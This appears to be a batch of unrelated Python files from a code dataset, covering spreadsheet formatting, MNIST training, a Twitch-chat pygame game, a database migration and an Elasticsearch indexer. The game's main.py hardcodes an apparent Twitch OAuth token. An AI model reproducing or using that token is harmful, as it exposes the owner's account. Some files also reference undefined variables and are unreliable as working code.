0.7, 0.75, 0.75)\n worksheet.set_margins(0.25, 0.25, 0.25, 0.25)\n\n # Header - set_header([header='',] options]])\n # e.g worksheet.set_header('&C%s' % filename)\n # worksheet.set_header(filename) # Default Center Justified\n worksheet.set_header('&C%s' % os.path.basename(filename))\n \n # worksheet.set_header('&CPage &P of &N') # Page 1 of 6\n # worksheet.set_header('&CUpdated at &T') # Updated at 12:30 PM\n\n # Footer - set_footer([footer='',] options]])\n worksheet.set_footer('&CPage &P of &N') # Page 1 of 6\n #worksheet.set_header('&CUpdated at &T') # Updated at 12:30 PM\n\n # Repeat rows - repeat_rows(first_row[, last_row])\n worksheet.repeat_rows(0) # Header Repeat\n\n # Grid lines\n '''\n The following values of option are valid:\n \n Don’t hide gridlines.\n Hide printed gridlines only.\n Hide screen and printed gridlines.\n \n '''\n # worksheet.hide_gridlines()\n \n # Row Column Headers - print_row_col_headers()\n # worksheet.print_row_col_headers()\n\n # Define print area - worksheet.print_area()\n # worksheet1.print_area('A1:H20') # Cells A1 to H20.\n # worksheet2.print_area(0, 0, 19, 7) # The same as above.\n\n # Print Across\n # worksheet.print_across()\n\n # Fit To Page - worksheet.fit_to_pages()\n # worksheet1.fit_to_pages(1, 1) # Fit to 1x1 pages.\n # worksheet2.fit_to_pages(2, 1) # Fit to 2x1 pages.\n # worksheet3.fit_to_pages(1, 2) # Fit to 1x2 pages.\n\n # Start print from page 2.\n # worksheet.set_start_page(2)\n\n # Set Print Scale - set_print_scale()\n worksheet.set_print_scale(66)\n\n # Page Breaks - worksheet.set_h_pagebreaks()\n # worksheet.set_h_pagebreaks([20]) # Break between row 20 and 21.\n # worksheet2.set_h_pagebreaks([20, 40, 60, 80, 100])\n\n # NOTE: replace h with v for vertical breaks - worksheet.set_v_pagebreaks()\n \n \n ####################################\n ########### Formatting #############\n ####################################\n \n # Add a bold format to use to highlight cells.\n bold = workbook.add_format({'bold': True})\n # Make header bold\n worksheet.set_row(0, None, bold)\n \n # Cell Format approach\n \n cell_format = workbook.add_format()\n # worksheet.set_row(0, None, cell_format.set_bold())\n\n # Align all centers horizontally and vertically\n cell_format.set_align('center')\n cell_format.set_align('vcenter')\n cell_format.set_align('vjustify')\n cell_format.set_text_wrap()\n cell_format.set_font_size(10)\n cell_format.set_border(1)\n\n # Font Family\n cell_format.set_font('Liberation Sans')\n #cell_format.set_font_family(''Liberation Sans'')\n cell_format.set_font_family('Liberation Sans')\n # cell_format.set_font_charset(178)\n '''\n # Set the format but not the column width.\n worksheet.set_column('C:C', None, format2)\n\n # Set the format but not the column width.\n worksheet.set_column('C:C', None, cell_format)\n '''\n\n worksheet.set_column('A:Z', None, cell_format)\n \n for i, width in enumerate(get_col_widths(df)):\n if width > max_width:\n width = max_width\n worksheet.set_column(i, i, width)\n # worksheet.set_default_row(20)\n # workbook.close()\n\n worksheet.set_row(0, None, cell_format)\n\n \n # Close the Pandas Excel writer and output the Excel file.\n writer.save()\n \n return 'SUCCESS'\n \n\n # iter_csv = pd.read_csv(file, iterator=True, chunksize=1000)\n # df = pd.concat([chunk[chunk['field'] > constant] for chunk in iter_csv]) \n '''\n try:\n with open(filename, 'r') as csv_file:\n logger.info('Reading [%s]' % filename)\n csv_source = csv_file.read()\n except Exception as e:\n logger.error('Exception when opening file[%s] - EXCEPT[%s:%s]' % (filenametype(e), e))\n raise e\n\n data = pd.DataFrame([], columns=['S.No', 'Mandal Name', 'Gram Panchayat', 'Village', 'Job card number/worker ID', 'Name of the wageseeker', 'Credited Date', 'Deposit (INR)', 'Debited Date', 'Withdrawal (INR)', 'Available Balance (INR)', 'Diff. time credit and debit'])\n try:\n df = pd.read_html(filename, attrs = {'id': 'ctl00_MainContent_dgLedgerReport'}, index_col='S.No.', header=0)[0]\n except Exception as e:\n logger.error('Exception when reading transaction table for jobcard[%s] - EXCEPT[%s:%s]' % (filename, type(e), e))\n return data\n logger.info('The transactions table read:\\n%s' % df)\n \n\n df = df.iloc[::-1] # Reverse the order for calculating diff time Debit dates are easier to record in this order\n for index, row in df.iterrows():\n logger.debug('%d: %s' % (index, row))\n\n serial_no = index\n logger.debug('serial_no[%s]' % serial_no)\n\n transaction_date = row['Transaction Date']\n logger.debug('transaction_date[%s]' % transaction_date)\n\n transaction_ref = row['Transaction Reference']\n logger.debug('transaction_ref[%s]' % transaction_ref)\n\n withdrawn_at = row['Withdrawn at']\n logger.debug('withdrawn_at[%s]' % withdrawn_at)\n\n deposit_inr = row['Deposit (INR)']\n logger.debug('deposit_inr[%s]' % deposit_inr)\n\n withdrawal_inr = row['Withdrawal (INR)']\n logger.debug('withdrawal_inr[%s]' % withdrawal_inr)\n\n availalbe_balance = row['Available Balance (INR)']\n logger.debug('availalbe_balance[%s]' % availalbe_balance)\n\n if deposit_inr == 0:\n (credited_date, debited_date, diff_time, debit_timestamp) = (transaction_date, 0, 0, pd.to_datetime(transaction_date, dayfirst=True)) # datetime.strptime(transaction_date, \"%d/%m/%Y\").timestamp())\n else:\n (credited_date, debited_date, diff_time) = (0, transaction_date, debit_timestamp - pd.to_datetime(transaction_date, dayfirst=True)) # datetime.strptime(transaction_date, \"%d/%m/%Y\").timestamp())\n logger.debug('credited_date[%s]' % credited_date)\n logger.debug('debited_date[%s]' % debited_date)\n logger.debug('diff_time[%s]' % diff_time)\n \n #csv_buffer.append('%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\\n' %(serial_no, mandal_name, bo_name, so_name, jobcard_id, account_holder_name, credited_date, debited_date, withdrawal_inr, availalbe_balance, diff_time))\n data = data.append({'S.No': serial_no, 'Mandal Name': mandal_name, 'Gram Panchayat': panchayat_name, 'Village': village_name, 'Job card number/worker ID': jobcard_id, 'Name of the wageseeker': account_holder_name, 'Credited Date': credited_date, 'Deposit (INR)': deposit_inr, 'Debited Date': debited_date, 'Withdrawal (INR)': withdrawal_inr, 'Available Balance (INR)': availalbe_balance, 'Diff. time credit and debit': diff_time}, ignore_index=True)\n\n data = data.set_index('S.No')\n data = data.iloc[::-1] # Reverse the order back to normal \n logger.info('The final table:\\n%s' % data)\n\n return data\n '''\n\nclass TestSuite(unittest.TestCase):\n def setUp(self):\n self.logger = loggerFetch('info')\n self.logger.info('BEGIN PROCESSING...')\n\n def tearDown(self):\n self.logger.info('...END PROCESSING')\n\n def test_printify(self):\n dirname = 'Jawaja'\n dirname = 'Dewata'\n for filename in os.listdir(dirname):\n result = printify(self.logger, filename=os.path.join(dirname,filename), max_width=30)\n self.assertEqual(result, 'SUCCESS')\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/scripts/printify.py","file_name":"printify.py","file_ext":"py","file_size_in_byte":10372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"537050340","text":"# coding: utf-8\n# # TensolFlow\n# ## 分類3層 (mnist)\n# ## [try]\n# - optimizerを変更しよう\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\niters_num = 3000\nbatch_size = 100\nplot_interval = 100\n\nhidden_layer_size_1 = 600\nhidden_layer_size_2 = 300\n\ndropout_rate = 0.5\n\nx = tf.placeholder(tf.float32, [None, 784])\nd = tf.placeholder(tf.float32, [None, 10])\nW1 = tf.Variable(tf.random_normal([784, hidden_layer_size_1], stddev=0.01))\nW2 = tf.Variable(tf.random_normal([hidden_layer_size_1, hidden_layer_size_2], stddev=0.01))\nW3 = tf.Variable(tf.random_normal([hidden_layer_size_2, 10], stddev=0.01))\n\nb1 = tf.Variable(tf.zeros([hidden_layer_size_1]))\nb2 = tf.Variable(tf.zeros([hidden_layer_size_2]))\nb3 = tf.Variable(tf.zeros([10]))\n\nz1 = tf.sigmoid(tf.matmul(x, W1) + b1)\nz2 = tf.sigmoid(tf.matmul(z1, W2) + b2)\n\nkeep_prob = tf.placeholder(tf.float32)\ndrop = tf.nn.dropout(z2, keep_prob)\n\ny = tf.nn.softmax(tf.matmul(drop, W3) + b3)\nloss = tf.reduce_mean(-tf.reduce_sum(d * tf.log(y), reduction_indices=[1]))\n\n# - optimizerを変更しよう\n# optimizer = tf.train.AdamOptimizer(1e-4)\noptimizer = tf.train.MomentumOptimizer(0.1, 0.9)\n\ntrain = optimizer.minimize(loss)\ncorrect = tf.equal(tf.argmax(y, 1), tf.argmax(d, 1))\naccuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\nfrom datetime import datetime\naccuracies = []\nfor i in range(iters_num):\n x_batch, d_batch = mnist.train.next_batch(batch_size)\n sess.run(train, feed_dict={x:x_batch, d:d_batch, keep_prob:(1 - dropout_rate)})\n if (i+1) % plot_interval == 0:\n accuracy_val = sess.run(accuracy, feed_dict={x:mnist.test.images, d:mnist.test.labels, keep_prob:1.0}) \n accuracies.append(accuracy_val)\n print (datetime.now ().strftime ('%H:%M:%S') + ' Generation: ' + str (i + 1) + '. 正解率 = ' + str (\n round (100 * accuracy_val, 2)) + '%')\n \nlists = range(0, iters_num, plot_interval)\nplt.plot(lists, accuracies)\nplt.title(\"accuracy 3(mnist) hidden_layer(600,300) RMSProp\")\nplt.ylim(0, 1.0)\nplt.show() \n","sub_path":"L4/4_1/4_1_tensorflow_4_分類3層(mnist)_04_RMSProp.py","file_name":"4_1_tensorflow_4_分類3層(mnist)_04_RMSProp.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"360294522","text":"import multiprocessing as mp\nimport os\nimport time\nimport pygame\nimport configparser \nimport sys\nimport pprint\nimport random\nimport utils , twitchchat, modsloader\nimport copy\nfrom copy import deepcopy\nglobal main_dir , locale\n\nmain_dir = os.path.split(os.path.abspath(sys.argv[0]))[0]\nlocale = \"de_DE\"\n\nif not pygame.font: print('Fehler pygame.font Modul konnte nicht geladen werden!')\nif not pygame.mixer: print('Fehler pygame.mixer Modul konnte nicht geladen werden!')\n\ndef main():\n heros_list = {} \n enemy_list = {}\n items_list = {}\n locale_list = {}\n question_list = {}\n persons_list = {}\n attribute_list = {}\n players_list = {}\n mods_list=\"\"\n mods_module = {}\n image_scale = 2\n pygame.init()\n fps_clock = pygame.time.Clock()\n myfont = pygame.font.SysFont(\"arial\", 14)\n myfont.set_bold(True)\n pygame.mouse.set_visible(1)\n pygame.key.set_repeat(1, 1)\n pygame.display.set_caption(\"Loading...INIT\")\n displaysizes = [1024 , 576] , [1280,720] , [1600,900] , [1920,1080] , [2048,1152] , [2560,1440] , [3200,1800], [3840,2160], [4096,2304], [5120,2880] , [7680,4320] , [15360,8640]\n #screen = pygame.display.set_mode(displaysize , pygame.FULLSCREEN )\n screen = pygame.display.set_mode(displaysizes[0])\n \n pygame.display.set_caption(\"Loading...MODS\")\n\n\n mods_list = modsloader.getMods(main_dir)\n #pprint.pprint (mods_list)\n for list in mods_list:\n print(\"Loading Mod:\" , list)\n mod = modsloader.loadMods((mods_list[list]))\n \n load = mod.loadattribute(os.path.join(main_dir,\"mods\",list))\n if not load == None:\n attribute_list[list] = load\n \n load = mod.loaditems(os.path.join(main_dir,\"mods\",list)) \n if not load == None:\n items_list[list] = load\n \n load = mod.loadlocale(os.path.join(main_dir,\"mods\",list), locale ) \n if not load == None:\n locale_list[list] = load\n \n load = mod.loadquestion(os.path.join(main_dir,\"mods\",list)) \n if not load == None:\n question_list[list] = load\n \n load = mod.loadpersons(os.path.join(main_dir,\"mods\",list))\n if not load == None: \n persons_list[list] = load\n\n \n #pprint.pprint (mods_list)\n #pprint.pprint (locale_list)\n for modname in persons_list:\n heros_list[modname] = {}\n enemy_list[modname] = {}\n for persons in persons_list[modname]:\n \n if persons_list[modname][persons][\"type\"] == \"hero\":\n heros_list[modname][persons] = {}\n heros_list[modname][persons] = {\"name\" : persons_list[modname][persons][\"name\"] , \"image\" : persons_list[modname][persons][\"image\"]}\n heros_list[modname][persons][\"attribute\"] = {modname : persons_list[modname][persons][\"attribute\"] }\n elif persons_list[modname][persons][\"type\"] == \"enemy\":\n enemy_list[modname][persons] = {} \n enemy_list[modname][persons] = {\"name\" : persons_list[modname][persons][\"name\"] , \"image\" : persons_list[modname][persons][\"image\"]}\n enemy_list[modname][persons][\"attribute\"] = {modname : persons_list[modname][persons][\"attribute\"] }\n enemy_list[modname][persons][\"surface\"] = utils.image_transform_scale (utils.loadImage (os.path.join(main_dir,\"mods\",modname, \"img\",persons_list[modname][persons][\"image\"][\"img\"]) , int(persons_list[modname][persons][\"image\"][\"tiles\"]) , int(persons_list[modname][persons][\"image\"][\"weight\"]) , int(persons_list[modname][persons][\"image\"][\"height\"]) ,persons_list[modname][persons][\"image\"][\"colorkey\"]), image_scale)\n \n for mod_attribute in attribute_list:\n for attribute in attribute_list[mod_attribute]:\n for enemy_list_mod in enemy_list:\n for persons in enemy_list[enemy_list_mod]:\n #print (enemy_list[enemy_list_mod][persons] , \"&&&\")\n if enemy_list[enemy_list_mod][persons][\"attribute\"].get(mod_attribute , None) == None:\n enemy_list[enemy_list_mod][persons][\"attribute\"][mod_attribute] = {}\n if enemy_list[enemy_list_mod][persons][\"attribute\"][mod_attribute].get(attribute , None) == None:\n enemy_list[enemy_list_mod][persons][\"attribute\"][mod_attribute][attribute] = None \n for hero_list_mod in heros_list:\n for persons in heros_list[hero_list_mod]:\n if heros_list[hero_list_mod][persons][\"attribute\"].get(mod_attribute , None) == None:\n heros_list[hero_list_mod][persons][\"attribute\"][mod_attribute] = {}\n if heros_list[hero_list_mod][persons][\"attribute\"][mod_attribute].get(attribute , None) == None:\n heros_list[hero_list_mod][persons][\"attribute\"][mod_attribute][attribute] = None \n\n #print (\"&&&&\" , enemy_list , \"&&&&\")\n\n #pprint.pprint (heros_list)\n #pprint.pprint (enemy_list)\n print (\"Wähle dein Helden\")\n i = 0\n i_list=[]\n for modname in heros_list:\n for heros in heros_list[modname]:\n print (i , \":\" , heros_list[modname][heros][\"name\"])\n i_list.append ([modname ,heros])\n i += 1\n print (\"Wähle dein Helden\") \n while True:\n try:\n print (\"Bitte geben sie eine Zahl ein.\")\n hero_number = int(input())\n except ValueError:\n print(\"Keine Zahl eingeben!?\")\n continue\n else:\n break\n #print (\"###\",i_list[hero_number][0],\"###\")\n modname = i_list[hero_number][0]\n heroname = i_list[hero_number][1]\n hero_stats = {\"hero\" : heros_list[modname][heroname],\n \"modname\" : modname,\n \"x\":10,\n \"y\":10,\n \"direction\": 0,\n 'surface' : utils.image_transform_scale (utils.loadImage (os.path.join(main_dir,\"mods\",modname, \"img\",heros_list[modname][heroname][\"image\"][\"img\"]) , heros_list[modname][heroname][\"image\"][\"tiles\"] , heros_list[modname][heroname][\"image\"][\"weight\"] , heros_list[modname][heroname][\"image\"][\"height\"] , heros_list[modname][heroname][\"image\"][\"colorkey\"]), image_scale)\n }\n #pprint.pprint (hero_stats)\n \n #print (hero_stats[\"surface\"])\n \n #[username , [x,y] , direction , modname , enemy name]\n func_holen = mp.Queue()\n func_geben = mp.Queue()\n p = mp.Process(target=twitchchat.chatlog, args=(func_holen, func_geben, \"nitrama\" , \"oauth:zg88wf2fpqlnntcsqb1e7vx3sq3980\" , \"#nitrama\" , locale_list))\n p.start()\n \n pygame.display.set_caption(\"Starts\")\n \n for modlist in question_list:\n for q in question_list[modlist]:\n #print (question_list[modlist][q]) \n if question_list[modlist][q][\"type\"] == \"important\":\n #print (\"name:\", q)\n func_geben.put([q, question_list[modlist][q], modlist]) \n \n rounds = 0\n running = True\n while running:\n if func_holen.empty() == False:\n question_holen = func_holen.get()\n # fragen abholen\n mod = modsloader.loadMods((mods_list[question_holen[\"modname\"]]))\n #modsloader.loadMods((list))\n \n request = mod.questionrequest(question_holen , players_list, hero_stats , enemy_list , items_list)\n \n for event in pygame.event.get():\n # Spiel beenden, wenn wir ein QUIT-Event finden.\n if event.type == pygame.QUIT:\n print (\"pressed escape\")\n p.terminate()\n pygame.display.quit()\n running = False\n break\n \n if event.type == pygame.KEYDOWN:\n # Wenn Escape gedrückt wird, posten wir ein QUIT-Event in Pygames Event-Warteschlange.\n if event.key == pygame.K_ESCAPE:\n print (\"pressed escape\")\n p.terminate()\n pygame.display.quit()\n running = False\n break\n if event.key == pygame.K_UP:\n hero_stats[\"y\"] -= hero_stats[speed_TXT]\n hero_stats[\"direction\"] = 1\n if event.key == pygame.K_DOWN:\n hero_stats[\"y\"] += hero_stats[speed_TXT]\n hero_stats[\"direction\"] = 0\n if event.key == pygame.K_LEFT:\n hero_stats[\"x\"] -= hero_stats[speed_TXT]\n hero_stats[\"direction\"] = 2\n if event.key == pygame.K_RIGHT:\n hero_stats[\"x\"] += hero_stats[speed_TXT]\n hero_stats[\"direction\"] = 3\n\n if running == True:\n #print (hero_stats[\"hero\"][\"image\"][\"height\"]*image_scale)\n playerrect = pygame.Rect(hero_stats[\"x\"], hero_stats[\"y\"],hero_stats[\"hero\"][\"image\"][\"weight\"]*image_scale, hero_stats[\"hero\"][\"image\"][\"height\"]*image_scale )\n for i in players_list:\n testrect = pygame.Rect(i[1][\"x\"], i[1][\"y\"], i[1][\"weight\"] * image_scale, i[1][\"height\"] * image_scale)\n if testrect.colliderect(playerrect):\n damage_player = i[2][attack_TXT] - hero_stats[defense_TXT]\n damage_play = hero_stats[attack_TXT] - i[2][defense_TXT]\n print (\"damage_play\" , damage_play)\n print (\"damage_player\" , damage_player)\n if damage_player > 0:\n hero_stats[health_TXT] -= damage_player\n if hero_stats[health_TXT] <= 0:\n print(\"game Over\")\n if damage_play > 0:\n i[2][health_TXT] -= damage_play\n if i[2][health_TXT] <= 0:\n players_list.remove(i)\n print (\"zombie kill\")\n print (\"collide\")\n \n pygame.display.set_caption(\"FPS:\"+str(fps_clock.get_fps()))\n fps_clock.tick(30) \n screen.fill((0,255,0))\n \n \"\"\"\n labelhealth = health_TXT + str(hero_stats[health_TXT]) + \"/\" + str(hero_stats[maxhealth_TXT])\n labelattack = attack_TXT + str(hero_stats[attack_TXT])\n labeldefense = defense_TXT + str(hero_stats[defense_TXT])\n labelspeed = speed_TXT + str(hero_stats[speed_TXT])\n labelitems = items_TXT + str(hero_stats[items_TXT])\n \n labelhealth = myfont.render(labelhealth , 0, (0,0,0))\n labelattack = myfont.render(labelattack , 0, (0,0,0))\n labeldefense = myfont.render(labeldefense , 0, (0,0,0))\n labelspeed = myfont.render(labelspeed , 0, (0,0,0))\n labelitems = myfont.render(labelitems , 0, (0,0,0))\n \n screen.blit(labelhealth, (0, 0))\n screen.blit(labelattack, (0,15))\n screen.blit(labeldefense, (0,30))\n screen.blit(labelspeed, (0,45))\n screen.blit(labelitems, (0,60))\n \"\"\"\n screen.blit (hero_stats[\"surface\"][hero_stats[\"direction\"]],(hero_stats[\"x\"],hero_stats[\"y\"]))\n for z in players_list:\n #print ()\n #print (zombies_stats[z[1][\"type\"]][z[1][\"direction\"]])\n screen.blit (z[1][\"surface\"][z[1][\"direction\"]] , (z[1][\"x\"],z[1][\"y\"]))\n pygame.display.flip()\n \nif __name__ == '__main__':\n mp.freeze_support() #für pyinstaller multiprocessing\n main()\n # Unsere Main-Funktion aufrufen","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"122075345","text":"#coding:utf-8\n\nimport os\nimport sys\nimport re\n\npath = '/data/www/baike_sql'\nsql_file = '%s/baike.sql' % path\nsql_file = open(sql_file, mode='a+', encoding='UTF-8')\n\ndef readDir(path):\n\tpathDir = os.listdir(path)\n\n\tfor item in pathDir:\n\t\tnew = '%s/%s' % (path, item)\n\t\tif os.path.isfile(new):\n\t\t\tsql = 'source %s;' % new\n\t\t\tsql_file.writelines(sql + '\\n')\n\t\t\tprint(sql)\n\t\telse:\n\t\t\treadDir(new)\n\nreadDir(path)\nsql_file.close()\n","sub_path":"source_sql.py","file_name":"source_sql.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"59113914","text":"\"\"\"empty message\n\nRevision ID: 087c2a9198cc\nRevises: e54b620851e1\nCreate Date: 2016-05-05 23:53:08.526756\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '087c2a9198cc'\ndown_revision = 'e54b620851e1'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('author', 'is_author',\n existing_type=mysql.TINYINT(display_width=1),\n type_=sa.Boolean(),\n existing_nullable=True)\n op.add_column('comment', sa.Column('comment_author', sa.String(length=100), nullable=True))\n op.drop_column('comment', 'author')\n op.alter_column('post', 'live',\n existing_type=mysql.TINYINT(display_width=1),\n type_=sa.Boolean(),\n existing_nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('post', 'live',\n existing_type=sa.Boolean(),\n type_=mysql.TINYINT(display_width=1),\n existing_nullable=True)\n op.add_column('comment', sa.Column('author', mysql.VARCHAR(length=100), nullable=True))\n op.drop_column('comment', 'comment_author')\n op.alter_column('author', 'is_author',\n existing_type=sa.Boolean(),\n type_=mysql.TINYINT(display_width=1),\n existing_nullable=True)\n ### end Alembic commands ###\n","sub_path":"migrations/versions/087c2a9198cc_.py","file_name":"087c2a9198cc_.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"418047547","text":"import unittest\r\n\r\nfrom is_day_in_regular_year import is_day_in_reg_year\r\n\r\nclass DayTestCase(unittest.TestCase):\r\n\r\n def test_pos(self):\r\n a = 1\r\n if a >= 1 and a <= 365:\r\n self.assertTrue(is_day_in_reg_year(a))\r\n\r\n def test_neg(self):\r\n wrong = [\"\", \" \", 0, 366, -1, 16.5, [], None]\r\n for a in wrong:\r\n if a in wrong:\r\n self.assertFalse(is_day_in_reg_year(a))\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"ca2_test_ecp_range_pos_neg.py","file_name":"ca2_test_ecp_range_pos_neg.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87834235","text":"import argparse\n\nimport torch\nfrom torch.utils.data.distributed import DistributedSampler\nfrom torch.utils.data import DataLoader\n\nfrom torchvision import datasets, transforms\n\n# Each process runs on 1 GPU device specified by the local_rank argument.\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--local_rank\", type=int)\nargs = parser.parse_args()\n\n# Initializes the distributed backend which will take care of sychronizing nodes/GPUs\ntorch.distributed.init_process_group(backend='nccl')\n\n# Encapsulate the model on the GPU assigned to the current process\ndevice = torch.device('cuda', args.local_rank)\n\nmodel = torch.nn.Linear(784, 10)\nmodel = model.to(device)\ndistrib_model = torch.nn.parallel.DistributedDataParallel(model,\n device_ids=[args.local_rank],\n output_device=args.local_rank)\n\n# Restricts data loading to a subset of the dataset exclusive to the current process\ntransform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,)),\n])\n\ndataset = datasets.MNIST(root, train=train, transform=transform, download=True)\nsampler = DistributedSampler(dataset)\n\ndataloader = DataLoader(dataset, sampler=sampler)\n\nprint('Starting training')\nfor inputs, labels in dataloader:\n predictions = distrib_model(inputs.to(device)) # Forward pass\n loss = loss_function(predictions, labels.to(device)) # Compute loss function\n loss.backward() # Backward pass\n optimizer.step() # Optimizer step\n print('.', end='')\n","sub_path":"hugging_face/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"73151108","text":"\r\n#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Author : Dengpan Fu (v-defu@microsoft.com)\r\n\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport os\r\nimport numpy as np\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.nn import functional as F\r\nfrom torch.nn import init\r\n\r\n\r\n\r\n\r\n\r\nclass MnistModel(nn.Module):\r\n \"\"\" Construct basic MnistModel for mnist adversal attack \"\"\"\r\n def __init__(self, re_init=False, has_dropout=False):\r\n super(MnistModel, self).__init__()\r\n self.re_init = re_init\r\n self.has_dropout = has_dropout\r\n self.conv1 = nn.Conv2d(1, 32, kernel_size=5, stride=1, padding=2)\r\n self.conv2 = nn.Conv2d(32, 64, kernel_size=5, stride=1, padding=2)\r\n self.pool = nn.MaxPool2d(2)\r\n self.relu = nn.ReLU(True)\r\n self.fc1 = nn.Linear(7*7*64, 1024)\r\n self.fc2 = nn.Linear(1024, 10)\r\n if self.has_dropout:\r\n self.dropout = nn.Dropout()\r\n\r\n if self.re_init:\r\n self._init_params(self.conv1)\r\n self._init_params(self.conv2)\r\n self._init_params(self.fc1)\r\n self._init_params(self.fc2)\r\n\r\n def forward(self, x):\r\n x = self.conv1(x)\r\n x = self.relu(x)\r\n x = self.pool(x)\r\n\r\n x = self.conv2(x)\r\n x = self.relu(x)\r\n x = self.pool(x)\r\n\r\n x = x.view(x.size(0), -1)\r\n x = self.fc1(x)\r\n x = self.relu(x)\r\n\r\n if self.has_dropout:\r\n x = self.dropout(x)\r\n\r\n x = self.fc2(x)\r\n\r\n return x\r\n\r\n def _init_params(self, module, mean=0.1, std=0.1):\r\n init.normal_(module.weight, std=0.1)\r\n if hasattr(module, 'bias'):\r\n init.constant_(module.bias, mean)\r\n\r\ndef mnist_net():\r\n return MnistModel()","sub_path":"code/base_model/MnistModel.py","file_name":"MnistModel.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"119886515","text":"import re\n\ndef isMatch(s: str, p: str) -> bool:\n\tresult = re.findall('^' + p + '$', s)\n\tif result != []:\n\t\treturn True\n\treturn False\t\n\t\ns = 'aab'\np = 'a.b'\nans = isMatch(s, p)\nprint(ans)","sub_path":"leetcode/isMatch.py","file_name":"isMatch.py","file_ext":"py","file_size_in_byte":186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"598107240","text":"from lib.utils import get_index_name\nimport logging\n__author__ = \"minh\"\n\n\nclass Indexer:\n def __init__(self, es):\n # logging.info(\"Initializing indexer\")\n self.es = es\n\n def init_analyzers(self, index_config):\n logging.info(\"Initializing analyzers\")\n self.es.indices.create(index=get_index_name(index_config), body={\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"textual\": {\n \"filter\": [\n \"standard\",\n \"lowercase\",\n \"stop\",\n ],\n \"type\": \"custom\",\n \"tokenizer\": \"standard\"\n },\n \"number_text\": {\n \"filter\": [\n \"lowercase\",\n \"word_delimiter\",\n \"stop\",\n ],\n \"type\": \"custom\",\n \"tokenizer\": \"standard\"\n },\n \"whitespace_text\": {\n \"filter\": [\n \"lowercase\",\n \"stop\",\n \"kstem\"\n ],\n \"type\": \"custom\",\n \"tokenizer\": \"whitespace\"\n }\n }\n }\n }\n })\n logging.debug(\"Done: Initializing analyzers\")\n\n def index_column(self, column, source_name, index_config):\n logging.info(\"Indexing column \" + str(column))\n body = column.to_json()\n body['source'] = source_name\n self.es.index(index=get_index_name(index_config), doc_type=source_name,\n body=body)\n\n def index_source(self, source, index_config):\n logging.info(\"Indexing source: {}\".format(source.name))\n # self.es.indices.put_mapping(index=get_index_name(index_config), doc_type=source.index_name, body={\n # source.index_name: {\n # \"properties\": {\n # \"whitespace_textual\": {\n # \"type\": \"string\",\n # \"analyzer\": \"whitespace_text\"\n # },\n # \"number_textual\": {\n # \"type\": \"string\",\n # \"analyzer\": \"number_text\"\n # }\n # }\n # }\n # })\n\n for column in source.column_map.values():\n if column.semantic_type:\n self.index_column(column, source.index_name, index_config)\n\n def delete_column(self, index_config):\n logging.info(\"Deleting index for column\")\n if self.es.indices.exists(get_index_name(index_config)):\n self.es.delete(index=get_index_name(index_config))\n return True\n return False\n\n def clean(self):\n logging.info(\"Cleaning elasticsearch indexer\")\n try:\n # NOTE: dangerous!\n self.es.indices.delete(index='*', ignore=[400, 404])\n return True\n except Exception as e:\n logging.error(\"Error occurred while cleaning index: {}\".format(e))\n print(\"Error occurred while cleaning index: {}\".format(e))\n raise Exception(\"Error occurred while cleaning index: {}\".format(e))\n","sub_path":"search/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312697933","text":"# coding:utf-8\n__author__ = 'albert233'\n\ndef check_field_exists(obj,data,field_none=[]):\n \"\"\"\n 验证字段是否合法\n 验证数据不能为空\n :param data: 需要验证的数据\n :param field_none: 可以为空的字段\n :return:\n \"\"\"\n\n for field in data.keys():\n if not hasattr(obj, field):\n # 验证字段是否存在\n raise Exception(\"params error\")\n if not data.get(field,None):\n # 验证字段是否为none\n if data[field] not in field_none:\n raise Exception(\"{}不能为空\")\n\ndef process_result(data, output):\n black = [\"_sa_instance_state\"]\n ret = []\n for obj in data:\n if output:\n tmp = {}\n for f in input:\n tmp[f] = getattr(obj,f)\n ret.append(tmp)\n else:\n tmp = obj.__dict__\n for p in black:\n try:\n tmp.pop(p)\n except:\n pass\n ret.append(tmp)\n return 